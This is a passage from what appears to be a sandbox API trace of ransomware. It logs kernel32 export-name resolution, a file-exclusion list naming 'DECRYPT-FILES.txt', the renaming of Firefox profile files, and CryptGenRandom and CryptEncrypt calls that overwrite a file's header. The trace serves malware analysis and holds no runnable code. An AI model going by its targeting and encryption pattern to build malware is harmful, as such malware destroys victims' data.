lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0081.981] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0081.981] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0081.981] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0081.981] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0081.981] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0081.981] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0081.981] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0081.981] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0081.981] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0081.981] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0081.981] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0081.981] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0081.981] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0081.981] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0081.981] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0081.981] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0081.981] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0081.981] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0081.981] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0081.981] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0081.982] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0081.982] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0081.982] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0081.982] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0081.982] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0081.982] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0081.982] lstrlenA (lpString="CTRLROUTINE") returned 11 [0081.982] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0081.982] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0081.982] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0081.982] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0081.982] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0081.982] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0081.982] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0081.982] lstrlenA (lpString="DEBUGBREAK") returned 10 [0081.982] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0081.982] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0081.982] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0081.982] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0081.982] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0081.982] lstrlenA (lpString="DECODEPOINTER") returned 13 [0081.982] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0081.982] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0081.982] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0081.982] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0081.982] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0081.982] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0081.982] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0081.982] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0081.982] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0081.982] lstrlenA (lpString="DELETEATOM") returned 10 [0081.982] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0081.982] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0081.982] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0081.982] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0081.982] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0081.982] lstrlenA (lpString="DELETEFIBER") returned 11 [0081.982] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0081.983] lstrlenA (lpString="DELETEFILEA") returned 11 [0081.983] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0081.983] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0081.983] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0081.983] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0081.983] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0081.983] lstrlenA (lpString="DELETEFILEW") returned 11 [0081.983] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0081.983] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0081.983] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0081.983] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0081.983] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0081.983] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0081.983] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0081.983] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0081.983] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0081.983] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0081.983] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0081.983] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0081.983] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0081.983] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0081.983] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0081.983] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0081.983] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0081.983] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0081.983] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0081.983] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0081.983] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0081.983] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0081.983] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0081.983] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0081.983] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0081.983] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0081.983] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0081.983] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0081.983] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0081.983] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0081.984] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0081.984] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0081.984] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0081.984] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0081.984] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0081.984] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0081.984] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0081.984] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0081.984] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0081.984] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0081.984] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0081.984] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0081.984] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0081.984] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0081.984] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0081.984] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0081.984] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0081.984] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0081.984] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0081.984] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0081.984] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0081.984] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0081.984] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0081.984] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0081.984] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0081.984] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0081.984] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0081.984] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0081.984] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0081.984] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0081.984] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0081.984] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0081.984] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0081.984] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0081.984] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0081.984] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0081.984] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0081.985] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0081.985] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite") returned 101 [0081.985] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite.3Naa7O") returned 108 [0081.985] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\places.sqlite"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite.3Naa7O" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\places.sqlite.3naa7o"), dwFlags=0x0) returned 1 [0081.986] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.986] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.986] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.987] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x81fbde30, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x81fbde30, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x81fbde30, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xe14, dwReserved0=0x0, dwReserved1=0x0, cFileName="pluginreg.dat", cAlternateFileName="PLUGIN~1.DAT")) returned 1 [0081.987] lstrcmpiW (lpString1="pluginreg.dat", lpString2="DECRYPT-FILES.txt") returned 1 [0081.987] lstrcmpiW (lpString1="pluginreg.dat", lpString2="autorun.inf") returned 1 [0081.987] lstrcmpiW (lpString1="pluginreg.dat", lpString2="boot.ini") returned 1 [0081.987] lstrcmpiW (lpString1="pluginreg.dat", lpString2="desktop.ini") returned 1 [0081.987] lstrcmpiW (lpString1="pluginreg.dat", lpString2="ntuser.dat") returned 1 [0081.987] lstrcmpiW (lpString1="pluginreg.dat", lpString2="iconcache.db") returned 1 [0081.987] lstrcmpiW (lpString1="pluginreg.dat", lpString2="bootsect.bak") returned 1 [0081.987] lstrcmpiW (lpString1="pluginreg.dat", lpString2="ntuser.dat.log") returned 1 [0081.987] lstrcmpiW (lpString1="pluginreg.dat", lpString2="thumbs.db") returned -1 [0081.987] lstrcmpiW (lpString1="pluginreg.dat", lpString2="Bootfont.bin") returned 1 [0081.987] lstrlenW (lpString="pluginreg.dat") returned 13 [0081.987] lstrcmpiW (lpString1="dat", lpString2="lnk") returned -1 [0081.987] lstrcmpiW (lpString1="dat", lpString2="exe") returned -1 [0081.987] lstrcmpiW (lpString1="dat", lpString2="sys") returned -1 [0081.987] lstrcmpiW (lpString1="dat", lpString2="dll") returned -1 [0081.987] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0081.987] lstrlenW (lpString="pluginreg.dat") returned 13 [0081.987] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0081.987] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="pluginreg.dat" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat" [0081.987] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0081.987] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\pluginreg.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0081.989] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=3604) returned 1 [0081.989] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0081.989] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0081.990] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0081.990] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0081.990] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0081.991] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0081.991] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0081.991] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.991] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0081.992] CloseHandle (hObject=0x464) returned 1 [0081.992] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.992] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0081.992] CloseHandle (hObject=0x0) returned 0 [0081.992] CloseHandle (hObject=0x460) returned 1 [0081.993] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.993] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.993] GetTickCount () returned 0x114cf9f [0081.993] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0081.993] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0081.993] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0081.994] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0081.994] lstrlenA (lpString="kernel32.dll") returned 12 [0081.994] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0081.994] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0081.994] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0081.994] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0081.994] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0081.994] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0081.994] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0081.994] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0081.994] lstrlenA (lpString="ADDATOMA") returned 8 [0081.994] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0081.994] lstrlenA (lpString="ADDATOMW") returned 8 [0081.994] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0081.994] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0081.994] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0081.994] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0081.994] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0081.994] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0081.994] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0081.994] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0081.995] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0081.995] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0081.995] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0081.995] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0081.995] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0081.995] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0081.995] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0081.995] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0081.995] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0081.995] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0081.995] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0081.995] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0081.995] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0081.995] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0081.995] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0081.995] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0081.995] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0081.995] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0081.995] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0081.995] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0081.995] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0081.995] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0081.995] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: 